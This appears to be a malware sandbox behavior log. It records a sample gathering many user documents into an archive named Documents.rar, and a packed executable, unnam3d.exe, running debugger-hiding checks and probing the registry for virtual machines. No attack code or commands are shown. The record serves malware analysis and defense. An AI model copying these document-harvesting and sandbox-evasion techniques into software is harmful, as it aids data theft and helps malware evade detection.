System Get Time type = Performance Ctr, time = 14343562588 True 1
System Get Time type = Ticks, time = 10908947 True 4
System Get Time type = Performance Ctr, time = 14344038731 True 1
System Get Time type = Ticks, time = 10908947 True 3
File Write filename = Documents.rar, size = 59296 True 1
File Write filename = Documents.rar, size = 109 True 1
File Create filename = GIwIhnYq\4aTOLAatL.rtf, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908947 True 1
System Get Time type = Ticks, time = 10908947 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14344801174 True 1
File Read filename = GIwIhnYq\4aTOLAatL.rtf, size = 1048576, size_out = 100922 True 1
File Read filename = GIwIhnYq\4aTOLAatL.rtf, size = 947654, size_out = 0 True 1
System Get Time type = Ticks, time = 10908962 True 1
System Get Time type = Performance Ctr, time = 14345092208 True 1
System Get Time type = Ticks, time = 10908962 True 4
System Get Time type = Performance Ctr, time = 14345949860 True 1
System Get Time type = Ticks, time = 10908962 True 3
File Write filename = Documents.rar, size = 85408 True 1
File Write filename = Documents.rar, size = 106 True 1
File Create filename = GIwIhnYq\gJxsA3QDXPNzu_.pps, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908962 True 1
System Get Time type = Ticks, time = 10908978 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14346517970 True 1
File Read filename = GIwIhnYq\gJxsA3QDXPNzu_.pps, size = 1048576, size_out = 71757 True 1
Fn
Data
File Read filename = GIwIhnYq\gJxsA3QDXPNzu_.pps, size = 976819, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908978 True 1
Fn
System Get Time type = Performance Ctr, time = 14346921669 True 1
Fn
System Get Time type = Ticks, time = 10908978 True 4
Fn
System Get Time type = Performance Ctr, time = 14347922753 True 1
Fn
System Get Time type = Ticks, time = 10908978 True 3
Fn
File Write filename = Documents.rar, size = 71904 True 1
Fn
Data
File Write filename = Documents.rar, size = 111 True 1
Fn
Data
File Create filename = HaxwmHj 0CtV7r4.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14348457753 True 1
Fn
File Read filename = HaxwmHj 0CtV7r4.docx, size = 1048576, size_out = 33859 True 1
Fn
Data
File Read filename = HaxwmHj 0CtV7r4.docx, size = 1014717, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = Performance Ctr, time = 14348734451 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 4
Fn
System Get Time type = Performance Ctr, time = 14349049955 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 3
Fn
File Write filename = Documents.rar, size = 33984 True 1
Fn
Data
File Write filename = Documents.rar, size = 104 True 1
Fn
Data
File Create filename = IdJZzMH4BMOKYzj.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14349439063 True 1
Fn
File Read filename = IdJZzMH4BMOKYzj.docx, size = 1048576, size_out = 75909 True 1
Fn
Data
File Read filename = IdJZzMH4BMOKYzj.docx, size = 972667, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 1
Fn
System Get Time type = Performance Ctr, time = 14349633996 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 4
Fn
System Get Time type = Performance Ctr, time = 14350254329 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 3
Fn
File Write filename = Documents.rar, size = 76064 True 1
Fn
Data
File Write filename = Documents.rar, size = 104 True 1
Fn
Data
File Create filename = Jrdm wCY_KpB5kAazb.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909009 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14350748276 True 1
Fn
File Read filename = Jrdm wCY_KpB5kAazb.docx, size = 1048576, size_out = 86062 True 1
Fn
Data
File Read filename = Jrdm wCY_KpB5kAazb.docx, size = 962514, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 1
Fn
System Get Time type = Performance Ctr, time = 14351151130 True 1
Fn
System Get Time type = Ticks, time = 10909025 True 4
Fn
System Get Time type = Performance Ctr, time = 14351875738 True 1
Fn
System Get Time type = Ticks, time = 10909025 True 3
Fn
File Write filename = Documents.rar, size = 86272 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = jWTOiGMc8-CGVj37-J.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909025 True 1
Fn
System Get Time type = Ticks, time = 10909025 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14352358362 True 1
Fn
File Read filename = jWTOiGMc8-CGVj37-J.xlsx, size = 1048576, size_out = 41390 True 1
Fn
Data
File Read filename = jWTOiGMc8-CGVj37-J.xlsx, size = 1007186, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 1
Fn
System Get Time type = Performance Ctr, time = 14352796106 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 4
Fn
System Get Time type = Performance Ctr, time = 14353229153 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 3
Fn
File Write filename = Documents.rar, size = 41504 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = K3zCHl_.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909040 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14353630916 True 1
Fn
File Read filename = K3zCHl_.xlsx, size = 1048576, size_out = 31343 True 1
Fn
Data
File Read filename = K3zCHl_.xlsx, size = 1017233, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 1
Fn
System Get Time type = Performance Ctr, time = 14353810243 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 4
Fn
System Get Time type = Performance Ctr, time = 14354393245 True 1
Fn
System Get Time type = Ticks, time = 10909056 True 3
Fn
File Write filename = Documents.rar, size = 31408 True 1
Fn
Data
File Write filename = Documents.rar, size = 96 True 1
Fn
Data
File Create filename = kSD3eNYHYfeDhhgpl4.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909056 True 1
Fn
System Get Time type = Ticks, time = 10909056 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14354916932 True 1
Fn
File Read filename = kSD3eNYHYfeDhhgpl4.pptx, size = 1048576, size_out = 84090 True 1
Fn
Data
File Read filename = kSD3eNYHYfeDhhgpl4.pptx, size = 964486, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909056 True 1
Fn
System Get Time type = Performance Ctr, time = 14355125992 True 1
Fn
System Get Time type = Ticks, time = 10909056 True 3
Fn
System Get Time type = Ticks, time = 10909071 True 1
Fn
System Get Time type = Performance Ctr, time = 14355850379 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 3
Fn
File Write filename = Documents.rar, size = 84304 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = KZD3FfQJWWhay.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909071 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14356399911 True 1
Fn
File Read filename = KZD3FfQJWWhay.docx, size = 1048576, size_out = 72483 True 1
Fn
Data
File Read filename = KZD3FfQJWWhay.docx, size = 976093, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 1
Fn
System Get Time type = Performance Ctr, time = 14356723355 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 4
Fn
System Get Time type = Performance Ctr, time = 14357314587 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 3
Fn
File Write filename = Documents.rar, size = 72656 True 1
Fn
Data
File Write filename = Documents.rar, size = 102 True 1
Fn
Data
File Create filename = L4AvX7khKXUu5.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909087 True 1
Fn
System Get Time type = Ticks, time = 10909087 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14357835393 True 1
Fn
File Read filename = L4AvX7khKXUu5.docx, size = 1048576, size_out = 34956 True 1
Fn
Data
File Read filename = L4AvX7khKXUu5.docx, size = 1013620, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909087 True 1
Fn
System Get Time type = Performance Ctr, time = 14358288190 True 1
Fn
System Get Time type = Ticks, time = 10909087 True 3
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Performance Ctr, time = 14359069542 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 3
Fn
File Write filename = Documents.rar, size = 35072 True 1
Fn
Data
File Write filename = Documents.rar, size = 102 True 1
Fn
Data
File Create filename = LUsVMCA2kX5.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14359481313 True 1
Fn
File Read filename = LUsVMCA2kX5.xlsx, size = 1048576, size_out = 21639 True 1
Fn
Data
File Read filename = LUsVMCA2kX5.xlsx, size = 1026937, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Performance Ctr, time = 14359645449 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 4
Fn
System Get Time type = Performance Ctr, time = 14359879626 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 3
Fn
File Write filename = Documents.rar, size = 21728 True 1
Fn
Data
File Write filename = Documents.rar, size = 100 True 1
Fn
Data
File Create filename = M-At.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14360223914 True 1
Fn
File Read filename = M-At.docx, size = 1048576, size_out = 82118 True 1
Fn
Data
File Read filename = M-At.docx, size = 966458, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Performance Ctr, time = 14360385126 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 3
Fn
System Get Time type = Ticks, time = 10909118 True 1
Fn
System Get Time type = Performance Ctr, time = 14361070378 True 1
Fn
System Get Time type = Ticks, time = 10909118 True 3
Fn
File Write filename = Documents.rar, size = 82320 True 1
Fn
Data
File Write filename = Documents.rar, size = 93 True 1
Fn
Data
File Create filename = M53FxPpcT\-GriIsafw.csv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909118 True 1
Fn
System Get Time type = Ticks, time = 10909118 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14361904546 True 1
Fn
File Read filename = M53FxPpcT\-GriIsafw.csv, size = 1048576, size_out = 82993 True 1
Fn
Data
File Read filename = M53FxPpcT\-GriIsafw.csv, size = 965583, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909134 True 1
Fn
System Get Time type = Performance Ctr, time = 14362288350 True 1
Fn
System Get Time type = Ticks, time = 10909134 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10909134 True 1
Fn
System Get Time type = Performance Ctr, time = 14363151967 True 1
Fn
System Get Time type = Ticks, time = 10909134 True 3
Fn
File Write filename = Documents.rar, size = 83200 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = M53FxPpcT\1ue2Dui.csv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909134 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14363686749 True 1
Fn
File Read filename = M53FxPpcT\1ue2Dui.csv, size = 1048576, size_out = 50145 True 1
Fn
Data
File Read filename = M53FxPpcT\1ue2Dui.csv, size = 998431, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 1
Fn
System Get Time type = Performance Ctr, time = 14364004512 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 4
Fn
System Get Time type = Performance Ctr, time = 14364574864 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 3
Fn
File Write filename = Documents.rar, size = 50288 True 1
Fn
Data
File Write filename = Documents.rar, size = 105 True 1
Fn
Data
File Create filename = M53FxPpcT\FCaj7Z UR1.ots, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909149 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14365019038 True 1
Fn
File Read filename = M53FxPpcT\FCaj7Z UR1.ots, size = 1048576, size_out = 20944 True 1
Fn
Data
File Read filename = M53FxPpcT\FCaj7Z UR1.ots, size = 1027632, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 1
Fn
System Get Time type = Performance Ctr, time = 14365630037 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 4
Fn
System Get Time type = Performance Ctr, time = 14365874690 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 3
Fn
File Write filename = Documents.rar, size = 21056 True 1
Fn
Data
File Write filename = Documents.rar, size = 108 True 1
Fn
Data
File Create filename = M53FxPpcT\oGJkVukoMxIO6MpIrH.xls, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909165 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14366253309 True 1
Fn
File Read filename = M53FxPpcT\oGJkVukoMxIO6MpIrH.xls, size = 1048576, size_out = 63479 True 1
Fn
Data
File Read filename = M53FxPpcT\oGJkVukoMxIO6MpIrH.xls, size = 985097, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 1
Fn
System Get Time type = Performance Ctr, time = 14366419678 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 3
Fn
System Get Time type = Ticks, time = 10909181 True 1
Fn
System Get Time type = Performance Ctr, time = 14366999869 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 3
Fn
File Write filename = Documents.rar, size = 63584 True 1
Fn
Data
File Write filename = Documents.rar, size = 116 True 1
Fn
Data
File Create filename = M53FxPpcT\s4EDs60 8.csv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909181 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14367460509 True 1
Fn
File Read filename = M53FxPpcT\s4EDs60 8.csv, size = 1048576, size_out = 45623 True 1
Fn
Data
File Read filename = M53FxPpcT\s4EDs60 8.csv, size = 1002953, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 1
Fn
System Get Time type = Performance Ctr, time = 14367704930 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 4
Fn
System Get Time type = Performance Ctr, time = 14368087488 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 3
Fn
File Write filename = Documents.rar, size = 45712 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = mevC_E6.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909196 True 1
Fn
System Get Time type = Ticks, time = 10909196 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14368823880 True 1
Fn
File Read filename = mevC_E6.docx, size = 1048576, size_out = 31620 True 1
Fn
Data
File Read filename = mevC_E6.docx, size = 1016956, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909196 True 1
Fn
System Get Time type = Performance Ctr, time = 14369013033 True 1
Fn
System Get Time type = Ticks, time = 10909196 True 4
Fn
System Get Time type = Performance Ctr, time = 14369543199 True 1
Fn
System Get Time type = Ticks, time = 10909196 True 3
Fn
File Write filename = Documents.rar, size = 31680 True 1
Fn
Data
File Write filename = Documents.rar, size = 96 True 1
Fn
Data
File Create filename = N-1n4D-yiI1zNCjze.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14369938975 True 1
Fn
File Read filename = N-1n4D-yiI1zNCjze.pptx, size = 1048576, size_out = 38855 True 1
Fn
Data
File Read filename = N-1n4D-yiI1zNCjze.pptx, size = 1009721, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = Performance Ctr, time = 14370107026 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 4
Fn
System Get Time type = Performance Ctr, time = 14370452631 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 3
Fn
File Write filename = Documents.rar, size = 38976 True 1
Fn
Data
File Write filename = Documents.rar, size = 106 True 1
Fn
Data
File Create filename = N5ZN.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14370837413 True 1
Fn
File Read filename = N5ZN.pptx, size = 1048576, size_out = 76712 True 1
Fn
Data
File Read filename = N5ZN.pptx, size = 971864, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = Performance Ctr, time = 14371030845 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 3
Fn
System Get Time type = Ticks, time = 10909227 True 1
Fn
System Get Time type = Performance Ctr, time = 14371737775 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 3
Fn
File Write filename = Documents.rar, size = 76880 True 1
Fn
Data
File Write filename = Documents.rar, size = 93 True 1
Fn
Data
File Create filename = N8uU1e.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909227 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:30 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14372202558 True 1
Fn
File Read filename = N8uU1e.xlsx, size = 1048576, size_out = 27261 True 1
Fn
Data
File Read filename = N8uU1e.xlsx, size = 1021315, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 1
Fn
System Get Time type = Performance Ctr, time = 14372474913 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 4
Fn
System Get Time type = Performance Ctr, time = 14372766487 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 3
Fn
File Write filename = Documents.rar, size = 27328 True 1
Fn
Data
For performance reasons, the remaining 797 entries are omitted.
The remaining entries can be found in glog.xml.
Process #9: unnam3d.exe
Information Value
ID #9
File Name c:\users\whuoxysd\appdata\local\temp\unnam3d.exe
Command Line "C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:55, Reason: Autostart
Unmonitor End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration 00:03:28
OS Process Information
Information Value
PID 0x730
Parent PID 0x6bc (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x734
0x7F4
0x7F8
0x7FC
0x4EC
0x4F4
0x580
0x6C8
0x6D8
0x728
Hook Information
Type Installer Target Size Information Actions
Code agiledotnetrt.dll:+0xfc2e6 ntdll.dll:DbgBreakPoint+0x0 1 bytes -
Code agiledotnetrt.dll:+0x4b698 clrjit.dll:sxsJitStartup+0x1e3bd 4 bytes -
Threads
Thread 0x734
Category Operation Information Success Count Logfile
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x713b0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75900000 True 1
Fn
Module Load module_name = user32.dll, base_address = 0x75c60000 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74f30000 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x76fc0000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x75f70000 True 1
Fn
Module Load module_name = shlwapi.dll, base_address = 0x75c00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759111a9 True 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Debug Hide c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = IsUserAnAdmin, address_out = 0x75fc44f5 True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe False 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x76fdfda0 True 1
Fn
System Get Info type = SYSTEM_MODULE_INFORMATION True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, value_name = DriverDesc, data = 83 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = VideoBiosVersion, data = 76 False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\crypt32.dll, base_address = 0x75710000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\psapi.dll, base_address = 0x75100000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\version.dll, base_address = 0x74ad0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75c60000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75900000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x76fee026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlLeaveCriticalSection, address_out = 0x76fe2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlEnterCriticalSection, address_out = 0x76fe22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlInitializeCriticalSection, address_out = 0x76ff2c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlReAllocateHeap, address_out = 0x77001f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlSizeHeap, address_out = 0x76ff3002 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x713c142e True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x713b0000 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x713c142e True 1
Fn
Module Load module_name = clrjit.dll, base_address = 0x741f0000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, function = getJit, address_out = 0x7423f70e True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 260 True 1
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, desired_access = FILE_READ_DATA, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 510104, size_out = 510104 True 1
Fn
Data
Environment Get Environment String name = UKKED False 1
Fn
System Get Time type = System Time, time = 2019-04-02 08:05:44 (UTC) True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x737b0000 True 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x73000000 True 1
